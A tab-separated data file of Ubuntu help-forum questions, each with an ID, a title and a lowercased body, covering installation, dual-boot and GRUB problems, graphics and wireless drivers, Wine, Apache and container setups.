394958	installing konica minolta pp1400w	new installation ubuntu 13.10 samba4 installed printer hp color laserjet and canon 4550 already successfully installed and networked to windows 7 machine . printer connected to machine via usb and detected by add printer software however when i continue it either stalls or give a installing driver screen and then returns to the select device screen . the printer was installed in previous versions of ubuntu up to 13.04
394959	xubuntu 13.10 install using identical hard drives on apple xserve 3-1	i successfully installed xubuntu 13.10 on an apple xserve 3-1 . i have a second apple xserve 3-1 with a malfunctioning graphics card , which i also wanted xubuntu installed on . my solution was to switch hard drives ( they easily pop in and out ) and use the hardware from the first xserve to run the install , and then switch back the hard drives . i successfully installed xubuntu on the second hard drive , however now i have a problem when i switch back to the original hard drive - it fails to recognize an installation on boot . if i boot with `` try ubuntu without installating '' from the installation , i can see that my original installation is still there once it boots . does anyone have any advice or ideas why this has happened ? thanks !
394962	wifi causing router crash when laptop runs off battery	i 'm experiencing a strange problem on my lenovo carbon x1 laptop with a fresh ubuntu install . the wifi appears to work fine when the external power source is connected . however as soon as the power cord is disconnected and the machine runs off the battery , the next attempt to load a webpage causes the router to crash and reboot . until the power cord is reconnected to the laptop , all subsequent attempts to access the web cause further crashes . as soon as the power cord is reconnected to the laptop , the wifi starts working normally again . there are no problems when using wifi on windows 8 , with or without the power connected . distro : 13.10 linux 3.11.0-14-generic network adapter/driver : *-network description : wireless interface product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 96 serial : 84:3a:4b:0d:5b:04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-14-generic firmware=18.168.6.1 ip=192.168.1.113 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:44 memory : f0c00000-f0c01fff syslog immediately after disconnecting the power , followed by an attempt to load a webpage : thinkpad_acpi : ec reports that thermal table has changed router model : thomson tg585 v8 i guess this is a driver issue , but any remedial advice would be greatly appreciated .
394964	msi ge70 screen brightness	i 've tested pretty much every option i could find online regarding getting to dim my screen brightness which is at max right now , but most solution i 've found are controling the brightness through /sys/class/backlight . however in my case /sys/class/backlight is empty . i 've also tried the various options by adding the acpi en vendor attributes to /etc/default/grub but none seem to work . so right now i 'm out of ideas and my eyes are getting pretty sore ... thanks
394967	gnome does n't store password in keyring	i 'm on 12.04 , trying to extract my login credintials from ~/.gnome2/keyrings/login.keyring and not having much luck , looks like that keyring is empty . seahorse is showing it as an empty keystore . i tried deleting it but it gets re-created upon login while still remains empty . pam configs do seem to call keyring daemon : $ grep keyring /etc/pam.d/* common-password : password optional pam_gnome_keyring.so gdm : auth optional pam_gnome_keyring.so gdm : session optional pam_gnome_keyring.so auto_start gnome-screensaver : auth optional pam_gnome_keyring.so lightdm : auth optional pam_gnome_keyring.so lightdm : session optional pam_gnome_keyring.so auto_start what am i missing ?
394969	dual-boot win7/ubuntu uninstall-reinstall	a bit more than two years ago i installed a modified version of ubuntu which was supposed to save the windows mbr automatically . this worked fine but it seems that the ubuntu distribution was n't 100 % perfect and it froze while installing . that 's why i got an unstable ubuntu install . the thing is that i wanted to create a data partition , in addition to my win7/ubuntu dual-boot . but as i had a special `` dell recovery partition '' thanks to which win7 boots that i can not delete/modify , thus i did n't had a partition left for data and had a few hundred gb unallocated space . now , i would like to uninstall and reinstall ubuntu to : give the unallocated space to the windows partition have a clean ubuntu . what is the best way to do that ? doing uninstall/install manually or using the ubuntu install tool ? please find below a screen of the different partitions ( in order : boot sector , win7recovery , win7 ( c ) , ubuntu swap , ubuntu and unallocated ) .
394970	can i use my laptop as a second monitor for my desktop ?	i want to know if its possible to use my laptop as a second screen . both my laptop and desktop have ubuntu 12.04 .
394972	rhythmbox wo n't play through bluetooth stereo adapter	i 'm running 13.04 on a dell m5030 laptop and a bluetooth dongle . the stereo has a aluratek bluetooth adapter . my iphone works on this set up and the laptop has no issues with the bt that i can see . everything is visible . it just does n't play music through the stereo . i saw a similar question about a bt headset and ran this in the command line . sudo apt-get install pulseaudio-module-bluetooth and it said everything was up to date and therefor did n't install . result is nothing other then built in speakers show up in the sound settings . i 'm stumped . how can i fix this ?
394973	login credentials stored somewhere ?	what happens to login credentials after i authenticate with lightdm ? is there are process that stores them ? would this be something that pam caches somewhere ? would lightdm hang on to them ? the problem i 'm trying to solve is re-requesting tgt without prompting for password long after user has been authenticated . for example , i authenticated with lightdm , worked on my laptop , started vpn session , logged into a different network and would like to acquire tgt without having to enter my password again . the only way i can see doing this if credentials are stored somewhere and i can re-use them or if i could somehow figure out who ( which process ) takes care of getting tgt after i initially authenticate ( which does happen automatically ) and sort of `` poke '' that process to go do it again ( but that means the process would have to have my credentials stored somewhere ) ...
394975	how backup data from ubuntu using a livedvd with another ubuntu	i use a dual boot between windows 7 and ubuntu 12.04 . i cant have acess to my ubuntu , and i would like to backup its data from another ubutu bootable . when i look in the partition of the hd that has the data of my ubuntu i cant copy that because i dont have permission , but the partition of windows i can.what should i do to backup my data from ubuntu ?
394977	how to remove google-injected groups in empathy ?	i 'm on ubuntu gnome . in settings - > online accounts i added the google account and enabled only the chat . what happens is that a plenty of groups in empathy , like coworkers , family , friends ... , emerges which i definitely do not like . i still have my own groups ( which work perfectly for jabber ) and i can put google contacts in them but these contacts remain in the google-injected groups . is it possible to get rid of the google-injected groups and use my own groups only ?
394982	how can i remote control ubuntu from a mac ?	so i am going out of town for a month and want to be able to control my ubuntu from my macbook pro since it will be mining litecoins and i want to be able to make sure it starts up/works correctly if something happens ( power outage , server goes down , etc ) . how do i go about this ? what do i need to do to get my computer to reboot automatically since i would n't be able to access ubuntu if the computer is off ( right ? ) ? is that in the bios ? what steps do i need to do in order to access the computer from my mac ?
394983	`` successful '' install allongside win 8.1 but not showing as option in boot	i downloaded to dvd , installed it and it gave the message that it had installed successfully but when i boot the pc ( hp pavillion g6/win8.1/8gbram ) it does not show up as a dual boot option , like it is supposed to . obviously i chose the option to install alongside win8 la la la.. it just goes straight to windows . so what do i have to do ? is there a magic key hold down or do i need to go into the bios and tweak something.. or what ?
394984	ca n't boot into ubuntu after install ?	i installed ubuntu 12.04 to my desktop on a new hdd and when it told me to reboot it turns on and says press s to skip mounting or m for manual recovery but my keyboard turns off as soon as it gets to that screen . and it just keeps turning off and back on
394986	broadcom bcm 43142	i have a lenovo g710 and i am unable to install my wireless card . here are the details : uname -a : linux ubuntu 3.8.0-34-generic # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci | grep network 07:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) i have tried several advices onlines but still not able to make it work . the ethernet card works perfectly ok . even my bluetooh device works ok. how can i fix this ? i am really new with linux .
394987	how to update kernel of 10.04 with a modified kernel ?	i want to keep the kernel i have but update my aacraid driver ( adaptec controller driver ) . the instructions for installing the driver is to copy their modified driver to the modules directory during installation and i 'm guessing installing this modified kernel . 7. cp -f /aacraid/aacraid.ko-pre_mod /lib/modules/2.6.32-28-generic/kernel/drivers/scsi/aacraid/aacraid.ko insmod /lib/modules/2.6.32-28-generic/kernel/drivers/scsi/aacraid/aacraid.ko 8 . press ctrl+alt+f1 to return to installer . continue the installation as usual . 9 . do not reboot after the installation is complete . press ctrl+alt+f2 to switch to console 2 again . 10 . type the following commands : # cp -f /aacraid/aacraid.ko-post_mod /target/lib/modules/2.6.32-28-server/kernel/drivers/scsi/aacraid/aacraid.ko # chroot /target # /sbin/depmod -a 2.6.32-28-server # update-initramfs -u -v # exit can i make the modification without doing a complete re-install of the operating system ?
394988	how does the fglrx interact with the i915 driver on hybrid gpu ?	i have a hybrid gpu , with a discrete radeon hd 8xxm series card , and the built in intel card . if i use the amd catalyst control centre to disable the dgpu , then sudo lshw -c video *-display description : vga compatible controller product : haswell-ult integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:59 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:5000 ( size=64 ) so i just see the one integrated card as expected , and it appears to be driven by the i915 module . but lsmod | grep fglrx fglrx 6728820 0 amd_iommu_v2 19198 1 fglrx so fglrx is still loaded ? does fglrx control both the dgpu and igpu somehow ? and yet the i915 is still needed also to drive the intel built-in card too ? if i can switch in catalyst control centre , does that mean my system is `` muxed '' ? if i turn back on the dgpu mode in catalyst , does this exclusivley use the high performance card , or is it `` dyanmic '' , switching when needed ?
394991	wine & nvidia resolution	i am having issues running games on wine . in ubuntu my native resolution is 1600x900 and i have the nvidia 3.19 drivers , yet when games load under wine ( version 1.7 ) they default to 1028x768 resolution . i have tried to adjust resolution in-game to 1600x900 ( it is an option ) but then i only get 1/3rd of the screen to display . i played around with winetricks and winecfg and was able to get civilization 5 , to launch and play in 1600x900 , but the same things i used for that wo n't work on other games . i did this by unchecking all the boxes in winecfg for the program , loaded into the game then went to the settings play in windowed mode , then switched resolution to 1600x900 and unchecked play in windowed mode ... do n't ask me how i figured that out , seems more like luck . regardless i have tried that in other games and it does n't work , i have also tried running a virtual dekstop at 1600x900 to no avail . it does n't matter what programs i run in wine , they all default to the 1028 res . it seems as if wine is defaulting any program to the 1028x768 resolution . when i exit any of those games my ubuntu deskstop is now in that resolution as well . i am trying to run games through steam ( for windows games , windows install through wine ) , and am running 12.04 lts . any native-linux games run fine . as i am new to ubuntu , please dumb down any instructions , thanks ! !
394992	removing grub / restoring windows bootloader	i really need you help because i ran out of solutions . i 've installed ubuntu in a usb pen , and i thought that i could use it just by booting from the usb port whenever i wanted to use ubuntu . what happened was that when i installed ubuntu into the usb pen , whenever i tried to boot without the usb pen plugged in it showed me this message , and still does : error : no such device ... grub rescue with the usb pen plugged in i can boot into ubuntu and windows , but i would like to be able to boot windows without using the usb pen . i 've already tried `` bootrec/fixmbr '' `` bootrec/fixboot '' with a windows 7 repair usb pen , and this tutorials : http : //www.heiser.net/posts/3256 https : //neosmart.net/wiki/recovering-windows-bootloader/ thanks
394993	kde desktop malfunctioning after re-install of nvidia drivers	i had a challenge with an nvidia api conflict after installing vmware player tools . after doing some research , i found this , resolved the issue by purging the driver installed by vmware and installing a new one from the command line . the gui is back but it is not functioning correctly . these are the symptoms : after entering my password , the 4/5 icons of a hard disk , spanner and wrench settings logo , globe and desktop come up . the kde logo does not . normally i have 4 desktops . now i am down to one . if i try to increase the number beyond 1 through pager settings , the application of the settings is ignored . any software i open is static in one place and stack at 0,0 . sizes of the windows as last used is intact but all positioning starts at those coordinates . borders and what not for resizing , moving , minimising or other manipulation of a program window do n't exist . all closing of programs has to be done clicking quit through the menu . keyboard shortcut of ctrl+q will not work and the x button top right does not appear . whereas i can enter my password with no challenge on start-up , using the keyboard is intermittent . editors like kate or kwrite will take data . but if i start a software that requires root permissions , the dialog box for the password will not accept input . any software i launch the tab for the program does not appear in the task bar . i do have a backup but it only covers /etc/ , /home/ , /usr/ and /var/ plus their subdirectories respectively . is there a re-install i can deploy to fix this ? any help someone can offer for a solution will be greatly appreciated . update 25 december i went through the steps again of purging the nvidia drivers and sudo apt-get install nvidia-current instead of sudo apt-get install nvidia-current-updates-dev . also re-ran sudo apt-get install nvidia-xconfig . also followed this article how do i restore my kde desktop to default ? to set aside plasma settings and/or all settings under ~/.kde/ . no joy . when the system starts up with a successful password entered , what is checked in order for the kde logo to appear ? as mentioned above , all 4 other icons load all right . the kde logo does not . i 'm wondering if there is a criteria there not satisfied and will serve as a clue . @ ash : vga section of lspci -v : 07:00.0 vga compatible controller : nvidia corporation g71gl [ quadro fx 3500 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : nvidia corporation device 032b flags : bus master , fast devsel , latency 0 , irq 16 memory at fa000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at fb000000 ( 64-bit , non-prefetchable ) [ size=16m ] i/o ports at dc80 [ size=128 ] [ virtual ] expansion rom at fce00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_304 , nouveau , nvidiafb
394998	why wmctrl does n't work for certain windows ?	francisco @ ubuntu : ~ $ wmctrl -l 0x02600006 0 ubuntu ărea de trabalho 0x03c00002 0 ubuntu xdndcollectionwindowimp 0x03c00005 0 ubuntu unity-launcher 0x03c00008 0 ubuntu unity-panel 0x03c0000b 0 ubuntu unity-dash 0x03c0000c 0 ubuntu hud 0x046000b3 0 ubuntu how to make a window aways on top ? - stack overflow - mozilla firefox 0x0520000b 0 n/a qt creator 0x05002396 0 ubuntu francisco @ ubuntu : ~ 0x0540000b 0 n/a backlight for windows that have the machine name column as n/a i 'm unable to send wmctrl commands like wmctrl -r `` window name '' -b add , above . why ? ( also , i do n't know why these windows are different regarding the machine name column ... ) my initial intent was to send such command to the backlight window , a frameless qt application . using the window system menu and checking the `` always on top '' works for the window though . i just like a programmatic means of doing the same .
395001	how to keep icon in unity launcher and remove from desktop ?	a number of applications ( e.g . crashplan ) install a desktop icon . this can be moved to also appear in the unity launcher bar , so now there are two icons . if i delete the desktop one the unity bar one also disappears . is there a way to just keep the one in the unity bar ?
395002	gnome ppp installation without connection	is there any way to install the gnome ppp package without an online connection . it opens in the software center but the install button is not active . i currently have wvdial package and gnome ppp package on desktop and have attempted to install with terminal . the result : dpkg : command not found . is this a permissions problem ? i 'm running 11.10 and attempting to set myself up to connect via external modem .
395003	ca n't seem to boot ubuntu from usb on vaio laptop	over the past two days i 've been trying to boot ubuntu from my vaio laptop . i have installed it on an older laptop and desktop before , and i would like to install it on this one , but i ca n't even get it to where i can use the `` try ubuntu '' option . upon attempting to boot from my usb as an `` external disk '' two things tend to happen . ( 1 ) a message very similar or probably the very same as syslinux 4.04 2010-10-22 edd copyright ( c ) 1994-2011 h. peter anvin et al appears for a split second , before the laptop restarts and tries to boot again , going in a never-ending loop , or ... ( 2 ) the screen flashes with striped rectangles of several different colors while making a sound that i assume would mean failure . i 've tried googling my way through this , but i ca n't seem to find anyone with this exact same issue . the laptops title currently has windows 7 , is 64-bit , uses h20 bios ( w/external disk boot enabled ) , the disk image i 'm trying to use is ubuntu-13.10-desktop-amd64 ( though before an earlier version did the same ) , and product name for the laptop is vpcel22fx . besides that , i 'm do n't know what else might be relevant . edit : also , the usb 's labeled `` datastick pro '' by centon .
395004	partition disks on virtualbox when installing ubuntu server	which option should i select in the 'partition disks ' screen when installing ubuntu server 12.04 x64 on an oracle virtualbox ? options are : guided - resize scsi3 ( 0,0,0 ) , partition # 5 ( sda ) and use freed space guided - use entire disk guided - use entire disk and set up lvm guided - use entire disk and set up encrypted lvm manual i selected guided - use entire disk and set up lvm but then got this scary message : note that all data on the disk you select will be erased , but not before you have confirmed that you really want to make the changes . i 'm assuming it 's only referring to the virtual hard drive and not the real hard drive on my computer . just want to confirm .
395008	efficient way to copy multiple files using the gui	i have a simple use case . i want o copy some music . i have an 8gb pen drive and my music folder where each album is a directory inside the artist name directory . i select some artists . i select a couple of albums and dragn'drop them . select some more , and copy again . the file manager almost freezes . the problem is that ubuntu tries to copy them simultaneously , instead of just queueing them . this parallel writing is extremely slow . yes , i could ctrl select every one and do just one dragn'drop action , but my experience is that i 'd make a wrong click and undo all my selection . i did n't think that it would be a problem in 2013 .
395012	ubuntu 13.10 graphics issues	i have not been able to install ubuntu on my hp envy 17 . i was wondering if there was a distro i could get that had the hp intel graphics 4400 driver installed . i was wondering if i could get an iso with that embedded in it . there is a driver for the card however i ca n't figure out how to put it on the install cd . the issue is the computer boots to startup screen but screen goes blank durring install ? zorin is the flavor i am trying to install however ubuntu works this same way even after using nomodeset . signed no clue !
395013	after trying to get ubuntu 13.10 to recognize windows 8 install windows 8 wo n't boot	i was trying to dual boot ubuntu 13.10 alongside windows 8 using a liveusb but when attempting to install ubuntu , it did n't recognize my windows 8 install . i did a couple things trying to get it to recognize it from this link and also tried zapping gpt structures as well . i believe when i zapped the gpt structures , bad things happened . now windows 8 will not boot but says it needs to be repaired . it references the winload.efi file missing or something . i tried making a windows recovery usb , but it is unable to refresh because the drive is locked , and it will not reset because a required drive partition is missing . i never ended up going through with the ubuntu install just to make sure everything else stayed put . i can see all my old files and all the old partitions are still there . how can i fix this ?
395016	keyboard backlight not working clevo p170sm	i just installed ubuntu 13.10 and i cant figure out how to turn on the keyboard backlight . i 've been doing google searches for a couple days and have n't found a solution that worked for me yet .
395017	ubuntu will not install from a 250gb seagate freeagent drive	i need some help . i am trying to boot ubuntu from my 250gb seagate freeagent drive and install it . however , whenever i boot from usb , it shows the screen with the person and what appears to be a keyboard , and then the computer reboots and tries to boot windows xp . my computer is a dell dimension b110 . i ca n't use the disc drive since it does not allow the disk i am trying to use . please tell me what i am doing wrong ...
395021	wired internet connection problem . ubuntu refuses to connect !	hello i 'm a new linux user running a fresh install of ubuntu 13.10 and so far have n't been able to connect to the internet . i 'm using the network manager included by default . it would appear that it 's searching for a wireless connection rather than using my ethernet . i 've tried changing settings , like switching the `` method '' under the `` ipv4 settings '' tab to manual but that did n't work . i tried unplugging my router ( linksys wrt54g ) and going in directly through the modem but that did n't work either . i 'm really hoping it 's something simple because i 'm currently using my router 's wireless to post this message while it 's plugged into the rig that ubuntu refuses to recognize .
395022	force format an encrypted/read only memory card	i had 1 gb memory card which i was using with my blackberry mobile . i suppose it was encrypted and read only . when is insert the memory card it shows the following file in it 9æ£¥z.c6 pretty weird name it is . i ca n't format the card as it shows read only files ! is my card permanently doomed ? anyway by which i can recover it ? attached is the image depicting card contents > > cardcontents i have already tried using windows 8 disk utility , ubuntu disk utility as well as terminal , none of them worked for me . please help !
395023	i want to compile a module on 3.13 for 3.11	i have 3.11.4 linux kernel on my target machine . and i have source of 3.13.0 . i want to compile brcm wireleess module from source and want to install that on target machine . my both machines are x86_64 . how can i do it ? i tried the following steps . i installed the headers for 3.11.4 then i used the command : make -c /lib/modules/3.11.0-14-generic/build m=drivers/net/wireless/brcm80211 it is giving errors : make : entering directory `/usr/src/linux-headers-3.11.0-14-generic' /usr/src/linux-headers-3.11.0-14-generic/arch/x86/makefile:107 : config_x86_x32 enabled but no binutils support mkdir : can not create directory `drivers/net/wireless/brcm80211/.tmp_versions ' : permission denied ld drivers/net/wireless/brcm80211/built-in.o ar : drivers/net/wireless/brcm80211/built-in.o : permission denied make [ 1 ] : *** [ drivers/net/wireless/brcm80211/built-in.o ] error 1 make : *** [ _module_drivers/net/wireless/brcm80211 ] error 2 make : leaving directory `/usr/src/linux-headers-3.11.0-14-generic'
395025	ubuntu not booting , live usb also not booting	i installed ubuntu 12.04 alongside the built in windows 8 . it worked fine except the grub menu did not appear but it went straight to ubuntu . so i did the boot-repair . this is the report . but after that when i reboot , i get the error invalid arch independent elf magic . and when i try to boot from a liveusb , i just get a black screen . so now i ca n't boot ubuntu at all ... please help .
395027	can not get to grub2 bootloader or ubuntu	ok , so i wanted to dual boot ubuntu 13.10 64bit with windows 7 64bit on my sony vaio laptop . i installed ubuntu to a separate partition ( /dev/sda6 ) and placed the boot loader with ubuntu on /dev/sda6 . i rebooted and was taken straight back to windows . it was expected , and i used easybcd 2.2 to edit my boot menu and add a grub2 ( automatically locate and load ) to the menu . i rebooted and when i selected it , i got a message saying `` windows failed to load '' . i retried easybcd , trying different possibilities like selecting partition 6 instead of the automatic option . it did not work . i re-installed ubuntu and put the boot loader in /dev/sda instead . i rebooted and i found myself , again , at the windows bootloader . i used easybcd to no avail . i re-installed ubuntu again with the boot loader back in /dev/sda6 and re-did easybcd , and again , failure . the error code was 0xc0000098 . i looked through the partitions that were already set up on my system and i found 6 : /dev/sda1 - fat32 - sonysys - hidden /dev/sda2 - ntfs - recovery - hidden , diag /dev/sda3 - fat32 - [ no label ] - boot /dev/sda4 - unknown - [ no label ] - msftres /dev/sda5 - ntfs - [ no label ] - msftdata /dev/sda6 - ext4 - [ no label , ubuntu 13.10 install ] - [ no flag ] what should i do ? can i please have detailed , specific instructions , because all answers i found did not work for my scenario . edit : in case i was unclear , the fail to load error is for ubuntu , i can still use windows fine .
395029	unremovable file on desktop 13.10	howdy and many thanks in advance for your time . when first installing ubuntu ( 13.04 , now running 13.10 on an acer aspire one netbook ) on this machine many months back i copied a folder from my old machine 's ( macbook pro ) hard drive to the desktop . the folder is locked and unreadable . i 've left it alone because it does n't seem to be doing any harm , i do n't need the space ( though i 've no idea how big the file is ) , and have access to a copied version of the file 's contents . when i try to open it i get `` this location could not be displayed . you do not have the permissions necessary to view the contents of 'documents ' . '' when trying to delete i first get , `` 'documents ' ca n't be put in the trash . do you want to delete it immediately ? '' clicking 'delete ' ( one of three options along with 'cancel ' and 'skip ' ) produces : `` error while deleting . the folder 'documents ' can not be handled because you do not have the permissions to read it . '' i 've run gksudo nautilus to try deleting the file or changing permissions that way but the folder can not be found in a nautilus window . nautilus seems to be a normally fine answer for permissions questions so i 'm stumped . presumably login in as root instead of gksudo would not mean nautilus could find it any better . any ideas how to delete this folder ? thanks again in advance .
395038	can you preview the effects of a command ?	how can you preview the effects of a command ? for instance , if i want to run rm -r ./* , or chown -r ./* . is it possible to run a safe `` test '' of that command with the ability to ensure that nothing stupid was happening before i ran it ?
395039	application wants access to keyring default in ubuntu 13.10	at every boot of ubunutu 13.10 i get the message : an application wants to access keyring default , but it is locked . what is it ? why am i getting this ? please guide a newbie . many thanks .
395040	grub wo n't load on windows 7 hp-pavillion p6 2014	i installed ubuntu 12.04 on my windows 7 hp-pavillion in a halved 1 terabyte hitachi partition through pendrive installed on a usb . my computer automatically starts windows 7 and when i go into the bios it only shows the hard drive as a whole and the grub boot is n't starting . also , ubuntu does n't show up in the windows booter . i have tried running the repair sudo commands in the live cd preview of ubuntu in terminal .
395045	how to repair grub ?	i have a vps using ubuntu 12.04 lts and i my host corrupted my vps so now it wo n't boot up . when it boots up it says : booting from hard disk ... error : file not found . grub rescue > how can i fix/repair this ?
395050	403 virtual host error -- ugh	i 've followed every example of what to do in every question that 's been asked about this issue here on ask ubuntu and yet , it still does n't work ( but what 's strange is some sites now get 500 errors instead of 403s ) . so if there is anybody out there who can help , here is what i 've got : i do n't have enough room on my main hd to fit all my sites so they are on a mounted drive ( /mnt/volume1 ) instead of being in /var/www . apache virtual host config : < virtualhost domain.com:80 > # # # server # # # # # # # # # # # # # # # # # servername domain.com serveralias *.domain.com serveradmin domains @ domain.com documentroot /mnt/volume1/domain # # # directory # # # # # # # # # # # # # # # # # # # # < directory /mnt/volume1/domain/ > options indexes followsymlinks multiviews allowoverride all require all granted < /directory > # # # logs # # # # # # # # # # # # # # # loglevel info errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /domain.access.log combined < /virtualhost > i 've done this : sudo find /var/www -type d -exec chmod g=rwxs `` { } '' \ ; sudo find /var/www -type f -exec chmod g=rws `` { } '' \ ; and chgrp the files to www-data as well . i just do n't get it . seriously , nothing works . i 've edited the apache2.conf to point to /mnt/volume1/ as the root directory for the www .
395052	consistency of gtk2 menus with gtk3	as mentioned in an omg ! ubuntu ! post , menus and toolbars of gtk3 apps are fixed in ubuntu themes . but there’s still an inconsistency in ubuntu theming between gtk2 and gtk3 menus where gtk2 apps don’t follow theme colors for menus . i know this is possible in gtk2 as well by editing gtkrc file and setting the menu style the same as the existing dark style . opening the gtkrc file , you can see these lines : style `` menu '' { xthickness = 0 ythickness = 0 engine `` murrine '' { roundness = 0 } } fixing the menu colors is as simple as changing the first line like this : style `` menu '' = `` dark '' { xthickness = 0 ythickness = 0 engine `` murrine '' { roundness = 0 } } but this leads to a problem with combobox menus , especially with ambiance because of the dark colors ; for example , in tomboy preferences all entries of a drop-down menu are illegible : i’ve just found the fix for this problem !
395055	trying to install vnc4server inside a docker ( lxc ) container	i 'm trying to install vnc4server inside a docker ( http : //www.docker.io ) container . its a lxc container . the config file to setup this container reads : from ubuntu maintainer deb @ sinhalabs.com run echo `` deb http : //archive.ubuntu.com/ubuntu precise main universe multiverse '' > /etc/apt/sources.list run apt-get update run apt-get install -y -- no-install-recommends ubuntu-desktop run apt-get install -y vnc4server add .vnc /home/ubuntu/.vnc add startup.sh /home/ubuntu/startup.sh the .vnc files have all the working files for vnc including xstartup and passwd . the add command to build the container copies all the files from the .vnc directory on my host machine into the container ( verified ) . however , every time i try to start vncserver in a new docker ( lxc ) container , it still prompts me to set up a password , despite the .vnc/passwd file having been copied into the container . how can i bypass that ? the idea of copying the passwd into the container was so i can have a 0-touch start to the container and start vncserver at boot-up time . thanks !
395058	problem with kivy installation	i 'm trying to install the kivy framework . but first i need to install these packages : python-setuptools python-pygame python-opengl python-gst0.10 python-enchant gstreamer0.10-plugins-good python-dev build-essential libgl1-mesa-dev libgles2-mesa-dev cython the problem i have is with libgles2-mesa-dev . when i try to install it i get the following : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgles2-mesa-dev : depends : libgles2-mesa ( = 8.0.4-0ubuntu0.6 ) depends : libegl1-mesa-dev e : unable to correct problems , you have held broken packages . i already reinstalled ubuntu ( i 'm using ubuntu 12.04 ) , because the last time i tried to install libgles2-mesa-dev i installed ligbles2-mesa and libegl1-mesa-dev , something went wrong and i broke xserver . what do i need to do in order to install it properly ? is there something i 'm doing wrong ? or am i missing something ?
395061	when i am updating 12.04 to 13.10 then following error show	e : unable to parse package file /var/lib/apt/lists/ archive.ubuntu.com_ubuntu_dists_quantal-updates_main_i18n_translation-en ( 1 ) , e : the package lists or status file could not be parsed or opened . this error show what i 'm doing to solve this error ?
395062	not able to upgrade to 13.10	my system not showing the upgrade button in the software updater window.h\how can i upgrade to newer version ?
395068	details showing unknown driver for graphic	i have amd graphics card , which have model number radeon hd 8450g . it is on a notebook , hp probook 445 g1 my ubuntu installation worked good . it was a fresh install . in the details tab of system settings , graphics driver is shown as `` unknown '' .
395069	juju local openstack deploy - how to reduce the memory/number of lxc containers ?	i 'm trying to setup openstack with vagrant inside a virtualbox guest , by following the juju instructions in the ubuntu cloud infrastructure wiki page and this askubuntu page . my github project is here . my provision scripts run without error [ see edit ] , but eventually the guest grinds to a halt because a large number of lxc containers are created and memory is exhausted . on the ubuntu wiki page , there are some instructions for reducing the number of lxc containers by deploying some services together : jitsu deploy-to [ machine # of keystone ] glance jitsu deploy-to [ machine # of mysql ] rabbitmq-server jitsu deploy-to [ machine # of keystone ] openstack-dashboard however , there are still quite a few lxc containers . question 1 : will deploying to fewer containers require significantly less memory ? question 2 : is it possible to host all openstack services in a single lxc container ? question 3 : what is the minimum memory i need to deploy openstack ? i 'm only looking to create a demo environment for openstack so usage will be very low . question 4 : is there a different way that i can reduce the guest memory requirements ? edit : juju status reports the following errors for nova-compute and nova-volume : nova-compute : charm : cs : precise/nova-compute-18 exposed : false relations : amqp : - rabbitmq-server cloud-compute : - nova-cloud-controller compute-peer : - nova-compute image-service : - glance shared-db : - mysql units : nova-compute/0 : agent-state : error agent-state-info : 'hook failed : `` install '' ' agent-version : 1.16.5.1 machine : `` 6 '' public-address : 10.0.3.24 nova-volume : charm : cs : precise/nova-volume-6 exposed : false relations : amqp : - rabbitmq-server nova-volume-service : - nova-cloud-controller shared-db : - mysql units : nova-volume/0 : agent-state : error agent-state-info : 'hook failed : `` install '' ' agent-version : 1.16.5.1 machine : `` 5 '' public-address : 10.0.3.240
395070	how to remove ubuntu 12.04 from a dual boot computer with windows 7	sir kindly tell me the steps that i can perfectly remove ubuntu from my computer . dual boot with windows 7 . system configuration is intel e5200 2.5 ghz ram 2gb hdd 500 gb .
395075	how to remove posnostyu graphical environment unity ubuntu ?	english > how to remove posnostyu graphical environment unity ubuntu ? russian > как посностью удалить графическое окружение unity убунту ?
395077	windows 7 not starting up after installing ubuntu 12.04	windows 7 was already installed on my laptop . i installed ubuntu 12.04 by dual boot partition , but when i start the laptop i get both ubuntu and windows on grub . when i click on windows it does n't start , and it says windows needs system repairs ( it starts repairing and then the computer is automatically turned off ) . ubuntu works fine , but i ca n't view my windows c drive files in ubuntu ( which are saved on the desktop in windows 7 ) . can you help me out with this ? i do n't want to lose my data on windows .
395081	problem in installing eclipsecoder in eclipse	while installing topcoder plugin in eclipse ( eclipsecoder ) i am getting the following error . i have installed pydev using python 3.3 but still i am getting this error . can not complete the install because one or more required items could not be found . software currently installed : eclipsecoder python support 0.2.2 ( net.fornwall.eclipsecoder.pythonsupport.feature.group 0.2.2 ) missing requirement : eclipsecoder python support 0.2.2 ( net.fornwall.eclipsecoder.pythonsupport 0.2.2 ) requires 'bundle org.python.pydev [ 1.3.0,2.0.0 ) ' but it could not be found can not satisfy dependency : from : eclipsecoder python support 0.2.2 ( net.fornwall.eclipsecoder.pythonsupport.feature.group 0.2.2 ) to : net.fornwall.eclipsecoder.pythonsupport [ 0.2.2 ] please help .
395088	change calendar language to english	the calendar in ubuntu 13.10 is not in english . i 've installed on two separate machines and the language is still the same . the language system wide is english .
395089	make sure that you have the appropriate privileges to create this folder . ( 0x2 ) error	since the last few days wine is not running well ( it worked for me before ) . when i try to install something ( photoshop/winamp ) it says folder 'c : \windows ' could not be created make sure that you have the appropriate privileges to create this folder . ( 0x2 ) or it says error writing temporary file . make sure that your temp folder is valid when i try to install photoshop it says setup has experienced an error . please do the following : -close any running program -empty your temporary folder -check our internet connection ( but internet is always connected in my laptop ) then try to run the setup again and also i ca n't remove any program ( that i installed before ) form wine , it has no response whether i click on it or not . so what can i do now to fix this problem ( i also reinstalled wine , but the same problem occurs ) . i am using wine-1.6.1
